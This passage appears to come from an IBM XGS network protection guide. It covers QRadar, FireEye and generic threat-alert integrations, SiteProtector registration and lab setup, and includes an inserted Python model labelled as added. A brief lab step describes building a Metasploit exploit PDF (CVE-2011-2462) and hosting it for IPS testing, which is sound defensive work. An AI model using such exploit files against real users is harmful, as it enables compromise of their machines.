Type the following command to obfuscate the password parameter in the isnp_alert.conf file.
This step is optional.
Note: The command obfuscates the parameter rather than encrypting it because the
encryption logic is hardcoded in the script.
The -T decrypt parameter is used to decrypt the contents of the file.
Restart the Tomcat server on the QRadar Console: navigate to the Admin tab > Advanced, and
click Restart Web Server.
Tip: You can also restart Tomcat by entering the following command on the QRadar
Console: # service tomcat restart.
Generating an ISNP alert from the QRadar console
Log on to the QRadar Console and navigate to the Network Activity or Log Activity view.
Right-click a source IP or destination IP address and select Generate ISNP Alert under Plugin
options.
QRadar launches a pop-up window that contains the results of the isnp_alert.pl command.
Verifying the ATP response in XGS
To navigate to the Advanced Threat Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Advanced Threat Events tab.
To verify the event detail, select the event and click View Details. In this example, the event from
QRadar has been mapped to a Reputation (High) ATP event, which created a quarantine rule.
Select the System Events tab and verify the system event that was triggered due to the creation
of the quarantine rule.
Select Secure Policy Configuration > Security Policies and navigate to Advanced Threat
Policy.
QRadar has 20 predefined rules, consisting of five Alert Types (Compromise, Exposure,
Intrusion, Malware, and Reputation) and four Alert Severities (High, Medium, Low and Unknown).
Some rules have been configured with quarantine responses. In this example, QRadar
generates a Reputation alert with High severity. This triggers the ATP-Reputation-Host
quarantine response.
Note: You can modify the Alert type and severity in the event by configuring the
arielRightClick.properties file under the /opt/qradar/conf directory on the QRadar
console.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify the quarantine rule triggered by the Advanced Threat Policy rule.
Optional: Deleting the Active Quarantine rule
You can delete the quarantine rule by selecting the active rule and clicking the delete button.
Click the Monitor Analysis and Diagnostics link from the main menu and then click Event Log.
Select the System Events tab. Verify the system event created for the deletion of the quarantine
rule.
Customizing QRadar Right-click integration
This customization use case describes how to add customized actions to the QRadar Right-Click
integration menu on the QRadar console so that you can send an ATP event with various event
types and severities. This section also contains procedures about creating new quarantine
response objects and setting the objects in an Advanced Threat Policy rule on XGS.
Configuring the QRadar Right-Click option
QRadar supports the customization of the Right-Click option on the QRadar console. The
Right-Click option allows the user to pass field values such as the IP address and port to any
command line utilities as command line parameters. The configurations are defined in the
arielRightClick.properties file under the /opt/qradar/conf directory on the QRadar console.
Enter the following command to edit the configuration file:
# vi /opt/qradar/conf/arielRightClick.properties
Note: Specify the information for the <label>.arielProperty field. The RightClick
module uses this information when the user right-clicks a field value on the QRadar
Console. For example, if the user specifies sourceIP, then that user can execute the
command (defined by <label>.command) by right-clicking the source IP address in
the QRadar Console.
<label>.text is shown as a plugin name on the web console.
<label>.useFormattedValue is always false.
<label>.command is always /opt/isnp/isnp_alert.pl for this integration.
<label>.arguments contains the CLI parameters of the isnp_alert.pl command.
These parameters can be used to specify Alert type and Alert severity.
To define a new action, add the ISNPCustomAction to the pluginActions parameter and specify
the five parameters for the ISNPCustomAction label.
Note: You can use the following command line parameters to specify the Alert type
and severity:
-C: To specify the configuration file that contains the URL and authentication
parameters.
-T: To specify the Alert type to trigger the respective Advanced Threat Policy rules.
-s: To specify the Alert severity to trigger the respective Advanced Threat Policy rules.
0-3 is low, 4-7 is medium, 8-9 is high and others are categorized as unknown. The
default value is 5.
Copy isnp_alert.conf to create a new configuration file. This configuration file is required for the
previous plugin customization step and is used in ISNPCustomAction.<argument>.
Note: If the parameters in the configuration file are encrypted or obfuscated, you
must decrypt the file before you copy it.
Type the following command to restart the Tomcat server.
Creating a new quarantine response
Select Secure Policy Configuration > Security Policies and navigate to the Advanced Threat
Policy.
By default, the policy generates an Event Log when XGS receives an Intrusion alert with a low
severity from QRadar.
Select the QRadar:Intrusion:Low rule and click the Edit button to add a quarantine response.
Select New > Quarantine to create a Quarantine response for this ATP rule.
Type the following values and save the setting:
Name: Test quarantine
Comment: Host/Port pair
Type: Intrusion
Select the Intruder Address, Intruder Port, Victim Address, and Victim Port check boxes.
Note: The Quarantine type that you configured in this step must be the same type
that you specified in the Advanced Threat Policy rule. In this example, both are set as
Intrusion.
Add the new Test quarantine Quarantine object to Current Responses.
Save the configuration and deploy the change.
Generating the custom ISNP alert from QRadar console
Log on to the QRadar Console and navigate to Network Activity or Log Activity view.
Right-click a source IP or destination IP address and select Generate Custom ISNP Alert under
Plugin options.
QRadar launches a pop-up window that contains the results of the isnp_alert.pl command.
Verifying the ATP response in XGS
To navigate to the Advanced Threat Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Advanced Threat Events tab.
To view the event details, select the event and click View Details. In this example, the event
from QRadar has been mapped to Intrusion (Low), which created a quarantine rule.
Note: The event details include information such as the Agent Alert Details
(Connection), type of protocol, source IP address, source port, destination IP
address, and destination port. In the previous use case, the Agent Alert Details was
Host. The difference is based on the arguments specified in the
arielRightClick.properties file.
In this example, if a user clicks a source IP address on the QRadar Console and
runs the following action, only the source IP address and/or source IPv6 address will
be included in the alert.
Select the System Events tab and verify the system event that was triggered because the
quarantine rule based on the Advanced Threat event was created.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify the quarantine rule that was triggered.
Configuring Generic ATP agent integration
This use case describes how to configure the Generic ATP agent and how to create and send an
Advanced Threat event. You can use this type of event to trigger quarantine rules based on
notifications from third-party security products. The Advanced Threat event is XML-based and the
schema is available on the IBM website. In this example, the XML-based Advanced Threat event
is sent using the Linux-based curl command line tool.
Tip: curl is a command line tool that can be used to send HTTP/HTTPS request
methods such as POST and GET. The tool is preinstalled on most Linux distributions.
A Windows version is also available for download and can be used for
demonstration and testing.
Configuring a generic ATP agent on XGS
Log on to the LMI of XGS and navigate to Manage System Settings > Network Settings >
Advanced Threat Protection Agents.
Click the New button and enter the following parameters:
Name: custom (you can specify a name to identify this configuration)
Agent Type: Generic
Address: 192.168.5.140 (The IP address of the system that sends the Advanced Threat
event to XGS. In this example, it is the IP address of the client PC where the Curl command line
utility will be executed.)
User name: generic_atp
Password: Passw0rd
Save the configuration and deploy the changes.
Generating an Advanced Threat alert using the curl command
To send an Advanced Threat event to the alert listening service on XGS, create a test XML file
on the client PC. In this example, the event type is intrusion and the severity is low.
Tip: The XML schema is available in a Technote on the IBM Support website:
http://www-01.ibm.com/support/docview.wss?uid=swg21662387.
Type the following curl command to send the Advanced Threat event as an HTTP POST request.
Note: The credentials specified with the -u option must be the same as the username and
password specified in the LMI in the previous step.
Verifying the ATP response in XGS
To navigate to the Advanced Threat Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Advanced Threat Events tab.
To verify the event detail, select the event and click View Details. In this example, the event from
the Generic agent has been mapped to Intrusion (Medium), which created a quarantine rule.
Select the System Events tab and verify the system event that was triggered because the
quarantine rule based on the Advanced Threat event was created.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify the quarantine rule that was triggered.
Configuring FireEye Web MPS integration
This use case describes how to configure the FireEye Web MPS integration so that XGS
receives notifications from FireEye and generates quarantine rules. In this example, FireEye
Web MPS detects a malware callback and sends the notification alert as an HTTP POST request.
XGS parses the notification, maps it to Advanced Threat events, and creates two quarantine
rules: one for the infected PC and one for the malicious (C&C) server.
Configuring a FireEye ATP agent on XGS
Log on to the XGS LMI and navigate to Manage System Settings > Network Settings >
Advanced Threat Protection Agents.
Click the New button and enter the following parameters:
Name: feye (you can specify a name to identify this configuration)
Agent Type: FireEye WebMPS 6.2
Address: 192.168.115.150 (IP address of FireEye WebMPS)
User name: feye
Password: Passw0rd
Click Save Configuration and deploy the changes.
Configuring event notifications on the FireEye WebMPS
Navigate to https://192.168.115.150 to log on to the FireEye web interface.
To access the HTTP notification configuration, select the Setting tab and click Notifications.
Then click the http column header to view the HTTP settings.
You can use the default parameters for the HTTP settings:
Default delivery: Per event
Default provider: Generic
Default format: XML Normal
Specify a name for the HTTP server to identify XGS and click the Add HTTP server button.
Enter the following parameters for the HTTP Server Listing section and click the Update button.
Enabled: enable
Server Url: https://192.168.115.186/agent_alert_listener
Username: feye
Password: Passw0rd
SSL Enabled: enable
Note: Use the user name and password that you specified during the FireEye ATP agent
configuration on XGS in the previous steps.
Mapping FireEye notifications to ATP events
On XGS, access the LMI and select Secure Policy Configuration > Security Policies and
navigate to Advanced Threat Policy.
FireEye has 12 predefined rules, which are the combinations of three Alert Types and four Alert
Severities. Some of the rules have been configured with a quarantine response.
The Malware-Callback notification sent by FireEye WebMPS is identified by XGS as both a
Compromise ATP alert and a Reputation ATP alert. In this scenario, the source IP address in the
Malware-Callback notification belongs to the infected PC and is added to the Compromise ATP
alert; that address is quarantined by the ATP-Compromise-Host quarantine object. The
destination IP address belongs to the C&C server and is added to the Reputation ATP alert; that
address is quarantined by the ATP-Reputation-Host object.
The Malware-Object notification sent by FireEye WebMPS is identified by XGS as a Malware
ATP alert. In this scenario, the source IP address in the notification is a server that sends
malware to a client and the IP address is marked as an Intruder Host address. The destination
IP is the client PC that received the malware and the IP address is treated as a Victim Host
address. The ATP-Malware-Intruder quarantine object is defined as a response for Malware
ATP rule. The quarantine object uses the Intruder Host address to create an active quarantine
rule.
The Web-Infection notification sent by FireEye WebMPS is identified by XGS as a Reputation
alert. In this scenario, if a client accesses a malicious URL, the URL is marked as a Target URL.
The ATP-Reputation-URL quarantine object is defined as a response for the Reputation ATP
rule. The quarantine object uses the URL to create an active quarantine rule.
Note: The notification sent by FireEye is XML based. The Web-Infection notification
includes the main URL, called the ObjURL, and some other suspicious URLs. The
FireEye integration includes only the ObjURL in the Web-Infection alert.
For the severity mapping, XGS maps FireEye's Crit, Majr, and Minr severity values to high,
medium, and low severity in the ATP alert. XGS maps any other severity value to the
unknown severity in the ATP alert.
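The following Python model is an added example, not code from the guide, XGS, or FireEye. It implements the alert-type and severity mapping described in this section over three constructed notifications, so that the alert each FireEye event type produces, and the address or URL each quarantine object acts on, can be seen side by side. The XML layout is a simplified stand-in for FireEye's XML Normal format, not the vendor schema, and the element and attribute names are assumptions. Which of the 12 policy rules actually carries a quarantine response is not modelled: every mapped alert is simply given the quarantine object named in the text.

```python
"""Model of how XGS maps FireEye Web MPS notifications to ATP alerts and
quarantine objects, following the mapping described above.

Added example, not code from the guide, XGS or FireEye. The XML below is a
constructed, simplified stand-in for FireEye's "XML Normal" notification; the
element and attribute names are assumptions, not the vendor schema.
"""
import xml.etree.ElementTree as ET

SEVERITY_MAP = {"crit": "high", "majr": "medium", "minr": "low"}

# Constructed sample notifications, one alert each (per-event delivery).
SAMPLE_NOTIFICATIONS = {
    "malware-callback": '<alerts><alert name="malware-callback" severity="crit">'
                        '<src ip="192.168.5.140"/><dst ip="203.0.113.10"/></alert></alerts>',
    "malware-object": '<alerts><alert name="malware-object" severity="majr">'
                      '<src ip="203.0.113.20"/><dst ip="192.168.5.140"/></alert></alerts>',
    "web-infection": '<alerts><alert name="web-infection" severity="majr">'
                     '<src ip="192.168.5.140"/><dst ip="203.0.113.30"/>'
                     '<objurl>http://203.0.113.30/landing/index.php</objurl>'
                     '<url>http://203.0.113.30/other.js</url></alert></alerts>',
}


def map_severity(fe_severity):
    """Crit/Majr/Minr -> high/medium/low; any other value -> unknown."""
    return SEVERITY_MAP.get(fe_severity.strip().lower(), "unknown")


def parse_notification(xml_text):
    """Extract the fields the mapping uses from one notification."""
    alert = ET.fromstring(xml_text).find("alert")
    if alert is None:
        raise ValueError("notification contains no <alert> element")

    def ip_of(tag):
        node = alert.find(tag)
        return node.get("ip") if node is not None else None

    return {
        "name": (alert.get("name") or "").lower(),
        "severity": alert.get("severity") or "",
        "src": ip_of("src"),
        "dst": ip_of("dst"),
        # Only the main URL (ObjURL) reaches the alert; the other suspicious
        # URLs in a Web-Infection notification are dropped.
        "objurl": alert.findtext("objurl"),
    }


def map_to_atp(event):
    """ATP alerts derived from one event, each with its quarantine object."""
    sev = map_severity(event["severity"])
    name = event["name"]
    if name == "malware-callback":
        # src is the infected PC (Compromise), dst is the C&C server (Reputation).
        return [
            {"type": "Compromise", "severity": sev, "host": event["src"],
             "quarantine": ("ATP-Compromise-Host", event["src"])},
            {"type": "Reputation", "severity": sev, "host": event["dst"],
             "quarantine": ("ATP-Reputation-Host", event["dst"])},
        ]
    if name == "malware-object":
        # src delivered the malware (Intruder Host), dst received it (Victim
        # Host); only the Intruder Host address is quarantined.
        return [{"type": "Malware", "severity": sev, "intruder": event["src"],
                 "victim": event["dst"],
                 "quarantine": ("ATP-Malware-Intruder", event["src"])}]
    if name == "web-infection":
        # The ObjURL becomes the Target URL and is quarantined as a URL.
        return [{"type": "Reputation", "severity": sev, "url": event["objurl"],
                 "quarantine": ("ATP-Reputation-URL", event["objurl"])}]
    return []   # other FireEye event types are not processed by the agent


def process_notification(xml_text):
    """Parse one notification and return the ATP alerts XGS would raise."""
    return map_to_atp(parse_notification(xml_text))


def active_quarantine_rules(alerts):
    """(quarantine object, quarantined address or URL) per alert."""
    return [a["quarantine"] for a in alerts]


if __name__ == "__main__":
    for kind, xml_text in SAMPLE_NOTIFICATIONS.items():
        alerts = process_notification(xml_text)
        print(kind, [(a["type"], a["severity"]) for a in alerts],
              active_quarantine_rules(alerts))
```

Running the script prints, for each sample, the alert types with their mapped severities and the quarantine objects with the address or URL they act on; the malware-callback sample yields two rules, the other two samples one each, which matches what the Active Quarantine Rules view shows in the tests that follow.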
Optional: Generating a FireEye event using the FireEye web console
On the FireEye web console, select an event type for testing and click the Test-Fire button.
Note: The FireEye ATP agent configuration on XGS can only receive and process
Malware Callback, Malware Object, and Web Infection events.
Note: The FireEye console might generate some errors (as shown below) when a test
notification is fired from the web console. In that case, consider using the FireEye
CLI utility instead.
Connecting to the FireEye CLI console to send a test notification
Connect to the FireEye appliance with an SSH client, then enter enable and configure terminal
so that you can run the command that sends a test notification event.
Testing a Malware Callback event
Type the following command to send the Malware Callback notification via HTTP.
fenotify test-fire malware-callback
To navigate to the Advanced Threat Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Advanced Threat Events tab.
In the case of the malware-callback, the FireEye event notification is identified by XGS as a
Compromise ATP event and a Reputation ATP event. The critical severity value is mapped to
the high severity on XGS.
To verify the event detail, select an event and click View Details.
Select the System Events tab and verify the system events that were triggered because two
quarantine rules based on the Malware-callback notification were created.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify the two active quarantine rules that were triggered.
Testing a Malware Object event notification
Type the following command to send Malware Object notification via HTTP.
fenotify test-fire malware-object
To navigate to the Advanced Threat Events, click the Monitor Analysis and Diagnostics link
from the main menu, and click Event Log. Select the Advanced Threat Events tab.
In the case of the malware-object, the FireEye event notification is mapped to the Malware ATP
event. The major severity value is mapped to the medium severity on XGS.
To view the event detail, select each event and click View Details.
Select the System Events tab and verify the system events that were triggered because the
quarantine rule based on the Malware-object notification was created.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify that the quarantine rule was created.
Testing a Web Infection event notification
Type the following command to send a Web Infection notification via HTTP.
fenotify test-fire web-infection
To navigate to the Advanced Threat Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Advanced Threat Events tab.
In the case of the Web-infection notification, the FireEye event notification is mapped to the
Reputation ATP event. The major severity value is mapped to the medium severity on XGS.
To view the event detail, select each event and click View Details.
Select the System Events tab and verify the system events that were triggered because the
quarantine rule based on the Web-infection notification was created.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify that the quarantine rule was created.
Integrating with SiteProtector
This section focuses on the procedure to register XGS to SiteProtector.
Note: When you register XGS with SiteProtector, some areas of the local management
interface become read only. When you unregister XGS from the SiteProtector system,
the local management interface becomes fully functional again.
Tip: You can configure XGS to send SNMP/Email/Remote Syslog alerts if the
connectivity with the SiteProtector system stops. Configure these alerts in Manage
System Settings > System Alerts.
Verify the IP address of SiteProtector.
Use the XGS command line interface to ping the SiteProtector IP address.
To navigate to SiteProtector Management, click Manage System Settings from the main menu
and select SiteProtector Management under System Settings.
Select the Register with SiteProtector check box and specify the Agent Name for XGS that
will appear in SiteProtector. Specify the SiteProtector Group Name for XGS. Set the Heartbeat
Interval to 300. Click the New button to add the Agent Manager information that XGS will send
a heartbeat message to.
Select the Enable check box. Enter 1 in the Priority field. Enter the Agent Manager name
(found on the Agent tab of the SiteProtector Console) in the Agent Manager Name field. The
Agent Manager Name is case sensitive. Set the Authentication Level to First Time Trust. First
Time Trust accepts the Agent Manager certificate that is presented on the first connection, so
make sure that the first registration happens over a trusted network path. Enter the IP address
of the Agent Manager in the Agent Manager Address field. Save the configuration and deploy
the changes.
The local management interface displays a notification that XGS is being managed by
SiteProtector.
Note: To unregister XGS from the SiteProtector system, clear the Register With
SiteProtector check box.
XGS is registered to SiteProtector.
Installing an XGS fix pack
This section focuses on the procedure to install a fix pack on XGS.
Unzip the fix pack file 5.2.0.0-ISS-XGS-All-Models-Hotfix-FP0002.zip.
In the LMI, click the Manage System Settings link on the main menu and then click Fix Packs
under Updates and Licensing.
Click the New button.
Click the Browse for fix pack button.
Browse to the directory where you extracted the zip file, select the file that you need to upload,
and click the Open button.
Click Save Configuration.
Restart XGS by clicking Manage System Settings on the main menu and selecting
Restart or Shut Down under System Settings.
Click the Restart button.
Click the Yes button.
Creating a PDF file for IPS testing
Log on to Kali Linux and start the Metasploit Framework console (msfconsole).
Use the adobe_reader_u3d (CVE-2011-2462) exploit module and set the target.
Specify the file name of the PDF and run exploit to create a PDF file.
Copy the PDF file to the vulnerable web server at 192.168.5.111.
The file can be downloaded from http://192.168.5.111/xgs4techies.pdf.
Preparing a virtual environment for study
Access developerWorks at the following URL and download the XGS virtual appliance with a
30-day license key: http://www.ibm.com/developerworks/downloads/security/xgs/index.html.
Download the VM image (OVA), license file, and setup guide.
Prepare the XGS virtual appliance in a VMware Workstation environment and connect the XGS,
client, and web server with virtual switches. The following picture shows a sample network for
running most of the use cases in this guide.
To modify virtual network configuration, open Virtual Network Editor.
Select VMnet8 and enter 192.168.5.0 in the Subnet IP field. Click OK to close the window.
Note: The Virtual Network Editor does not show the VMnet7 network, but it is configured
as a network without a Subnet IP and is available to each VM instance by default.
Notices
This information was developed for products and services offered in the U.S.A. IBM may not
offer the products, services, or features discussed in this document in other countries. Consult
your local IBM representative for information on the products and services currently available in
your area. Any reference to an IBM product, program, or service is not intended to state or imply
that only that IBM product, program, or service may be used. Any functionally equivalent product,
program, or service that does not infringe any IBM intellectual property right may be used instead.
However, it is the user's responsibility to evaluate and verify the operation of any non-IBM
product, program, or service.
IBM may have patents or pending patent applications covering subject matter described in this
document. The furnishing of this document does not give you any license to these patents. You
can send license inquiries, in writing, to:
IBM Director of Licensing IBM Corporation North Castle Drive Armonk, NY 10504-1785 U.S.A.
For license inquiries regarding double-byte character set (DBCS) information, contact the
IBM Intellectual Property Department in your country or send inquiries, in writing, to:
Intellectual Property Licensing Legal and Intellectual Property Law IBM Japan, Ltd. 19-21,
Nihonbashi-Hakozakicho, Chuo-ku Tokyo 103-8510, Japan
The following paragraph does not apply to the United Kingdom or any other country
where such provisions are inconsistent with local law:
INTERNATIONAL BUSINESS MACHINES CORPORATION PROVIDES THIS PUBLICATION
"AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF NON-INFRINGEMENT,
MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.
Some states do not allow disclaimer of express or implied warranties in certain transactions,
therefore, this statement might not apply to you.
This information could include technical inaccuracies or typographical errors. Changes are
periodically made to the information herein; these changes will be incorporated in new editions of
the publication. IBM may make improvements and/or changes in the product(s) and/or the
program(s) described in this publication at any time without notice.
Any references in this information to non-IBM Web sites are provided for convenience only and
do not in any manner serve as an endorsement of those Web sites. The materials at those Web
sites are not part of the materials for this IBM product and use of those Web sites is at your own
risk.
IBM may use or distribute any of the information you supply in any way it believes appropriate
without incurring any obligation to you.
Licensees of this program who wish to have information about it for the purpose of enabling: (i)
the exchange of information between independently created programs and other programs
(including this one) and (ii) the mutual use of the information which has been exchanged, should
contact: IBM Corporation 2Z4A/101 11400 Burnet Road Austin, TX 78758 U.S.A.
Such information may be available, subject to appropriate terms and conditions, including in
some cases payment of a fee.
The licensed program described in this document and all licensed material available for it are
provided by IBM under terms of the IBM Customer Agreement, IBM International Program
License Agreement or any equivalent agreement between us.
Any performance data contained herein was determined in a controlled environment. Therefore,
the results obtained in other operating environments may vary significantly. Some
measurements may have been made on development-level systems and there is no guarantee
that these measurements will be the same on generally available systems. Furthermore, some
measurement may have been estimated through extrapolation. Actual results may vary. Users of
this document should verify the applicable data for their specific environment.
Information concerning non-IBM products was obtained from the suppliers of those products,
their published announcements or other publicly available sources. IBM has not tested those
products and cannot confirm the accuracy of performance, compatibility or any other claims
related to non-IBM products. Questions on the capabilities of non-IBM products should be
addressed to the suppliers of those products.
All statements regarding IBM's future direction or intent are subject to change or withdrawal
without notice, and represent goals and objectives only.
All IBM prices shown are IBM's suggested retail prices, are current and are subject to change
without notice. Dealer prices may vary.
This information is for planning purposes only. The information herein is subject to change before
the products described become available.
This information contains examples of data and reports used in daily business operations. To
illustrate them as completely as possible, the examples include the names of individuals,
companies, brands, and products. All of these names are fictitious and any similarity to the
names and addresses used by an actual business enterprise is entirely coincidental.
COPYRIGHT LICENSE:
This information contains sample application programs in source language, which illustrate
programming techniques on various operating platforms. You may copy, modify, and distribute
these sample programs in any form without payment to IBM, for the purposes of developing,
using, marketing or distributing application programs conforming to the application programming
interface for the operating platform for which the sample programs are written. These examples
have not been thoroughly tested under all conditions. IBM, therefore, cannot guarantee or imply
reliability, serviceability, or function of these programs. You may copy, modify, and distribute
these sample programs in any form without payment to IBM for the purposes of developing,
using, marketing, or distributing application programs conforming to IBM's application
programming interfaces.
Each copy or any portion of these sample programs or any derivative work, must include a
copyright notice as follows: © IBM 2014. Portions of this code are derived from IBM Corp.
Sample Programs. © Copyright IBM Corp 2014. All rights reserved. If you are viewing this
information in softcopy form, the photographs and color illustrations might not be displayed.
Trademarks
IBM, the IBM logo, and ibm.com are trademarks or registered trademarks of International
Business Machines Corp., registered in many jurisdictions worldwide. Other product and service
names might be trademarks of IBM or other companies. A current list of IBM trademarks is
available on the Web at Copyright and trademark information at ibm.com/legal/copytrade.shtml.
Adobe is either a registered trademark or a trademark of Adobe Systems Incorporated in the
United States, and/or other countries.
Linux is a registered trademark of Linus Torvalds in the United States, other countries, or both.
Skype, Microsoft, Windows, Windows NT, and the Windows logo are trademarks of Microsoft
Corporation in the United States, other countries, or both.
Java and all Java-based trademarks and logos are trademarks or registered trademarks of
Oracle and/or its affiliates.
Flickr is a registered trademark of Yahoo.
Dropbox and the Dropbox logo are trademarks of Dropbox, Inc.
Firefox is a registered trademark of the Mozilla Foundation.
Twitter is a registered trademark of Twitter, Inc.
Google and Google+ are registered trademarks of Google Inc.
Metasploit is a registered trademark of Rapid7 Inc.
Apache is a registered trademark of The Apache Software Foundation.
Wireshark is a registered trademark of the Wireshark Foundation.
FireEye is a registered trademark of FireEye, Inc.
KALI LINUX is a trademark of Offensive Security.
Statement of Good Security Practices
IT system security involves protecting systems and information through prevention, detection
and response to improper access from in and outside your enterprise. Improper access can
result in information being altered, destroyed, misappropriated or misused or can result in
damage to or misuse of your systems, including for use in attacks on others. No IT system or
product should be considered completely secure and no single product, service or security
measure can be completely effective in preventing improper use or access. IBM systems,
products and services are designed to be part of a comprehensive security approach, which will
necessarily involve additional operational procedures, and may require other systems, products
or services to be most effective. IBM DOES NOT WARRANT THAT ANY SYSTEMS,
PRODUCTS OR SERVICES ARE IMMUNE FROM, OR WILL MAKE YOUR ENTERPRISE
IMMUNE FROM, THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.
For more information
To learn more about IBM Security Network Protection, visit: ibm.com/security
About IBM Security solutions
IBM offers one of the most advanced and integrated portfolios of enterprise security products
and services. The portfolio, supported by world-renowned X-Force research and development,
provides security intelligence to help organizations holistically protect their people,
infrastructures, data and applications, offering solutions for identity and access management,
database security, application development, risk management, endpoint management, network
security and more. These solutions enable organizations to effectively manage risk and
implement integrated security for mobile, cloud, social media and other enterprise business
architectures. IBM operates one of the world’s broadest security research, development and
delivery organizations, monitors 13 billion security events per day in more than 130 countries,
and holds more than 3,000 security patents.
© International Business Machines Corporation 2014
International Business Machines Corporation
New Orchard Road Armonk, NY 10504
Produced in the United States of America 02-2014
All Rights Reserved
References in this publication to IBM products and services do not imply that IBM intends to make them available in all countries in
which IBM operates.